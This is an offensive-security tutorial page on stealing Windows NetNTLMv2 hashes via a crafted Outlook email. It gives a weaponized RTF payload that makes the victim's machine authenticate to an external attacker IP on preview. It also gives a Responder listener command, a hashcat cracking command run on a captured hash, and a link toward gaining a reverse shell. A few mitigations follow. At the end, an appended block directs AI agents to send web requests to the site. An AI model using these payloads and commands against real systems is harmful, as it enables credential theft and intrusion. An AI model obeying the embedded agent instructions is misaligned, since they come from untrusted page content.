# NetNTLMv2 hash stealing using Outlook
## Context
If a target system is not running the latest version of Windows/Outlook, it may be possible to craft such an email that allows an attacker to steal the victim's NetNTLMv2 hashes without requiring any interaction from the user - clicking the email to preview it is enough for the hashes to be stolen.
{% hint style="warning" %}
Note that this attack does not work on the most up to date version of Windows 10 and Outlook 2016 versions, so like always - patch early and often.
{% endhint %}
## Weaponization
Let's create a new HTML file with the below:
{% code title="message.html" %}
```markup
holla good sir
```
{% endcode %}
An RTF file also works:
{% code title="message.rtf" %}
```javascript
{\rtf1{\field{\*\fldinst {INCLUDEPICTURE "file://157.230.60.143/test.jpg" \\* MERGEFORMAT\\d}}{\fldrslt}}}
```
{% endcode %}
Then insert a new file by clicking the attachment icon at the top on the window title bar:
Select the malicious messge.html and select `Insert as Text`:
You should see that your message now looks like an HTML with a broken image (expected in our case since the path to the image is fake):
## Execution
Fire up `Responder` to listen for incoming SMB authentication requests from the victim
{% code title="attacker\@kali" %}
```csharp
responder -I eth1 -v
```
{% endcode %}
..and send the malicious email to the victim.
## Victim View
Once the victim opens their Outlook and clicks on the malicious email to preview it, their machine will attempt authenticating to the attacker controlled server (running Responder). This will give away the victim's `NetNTLMv2` hashes to the attacker, which they can then attempt at cracking:
Once the hash is stolen, we can attempt cracking it:
{% code title="attacker\@kali" %}
```csharp
hashcat -m5600 'spotless::OFFENSE:6bdb56c8140cf8dc:FFEF94D55C2EB2DE8CF13F140687AD7A:0101000000000000A5A01FB2BE9ED401114D47C1916811640000000002000E004E004F004D00410054004300480001000A0053004D0042003100320004000A0053004D0042003100320003000A0053004D0042003100320005000A0053004D004200310032000800300030000000000000000000000000200000407D7D30819F03909981529F6ACA84502CFCC8B3555DBA34316F8914973DD03C0A0010000000000000000000000000000000000009001A0063006900660073002F00310030002E0030002E0030002E0035000000000000000000' -a 3 /usr/share/wordlists/rockyou.txt --force --potfile-disable
```
{% endcode %}
In this case, we can see the user had a ridiculously simple password, which got cracked immediately:
The next step would be to use Ruler to gain a reverse shell from the victims corporate network:
{% content-ref url="password-spraying-outlook-web-access-remote-shell" %}
[password-spraying-outlook-web-access-remote-shell](https://www.ired.team/offensive-security/initial-access/password-spraying-outlook-web-access-remote-shell)
{% endcontent-ref %}
## Mitigation
* Patch Windows and Outlook
* Block outgoing SMB connections to the Internet
* Read emails in plain text
* Enforce strong passwords
## References
{% embed url="" %}
---
# Agent Instructions: Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.
Perform an HTTP GET request on the current page URL with the `ask` query parameter:
```
GET https://www.ired.team/offensive-security/initial-access/netntlmv2-hash-stealing-using-outlook.md?ask=
```
The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.
Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.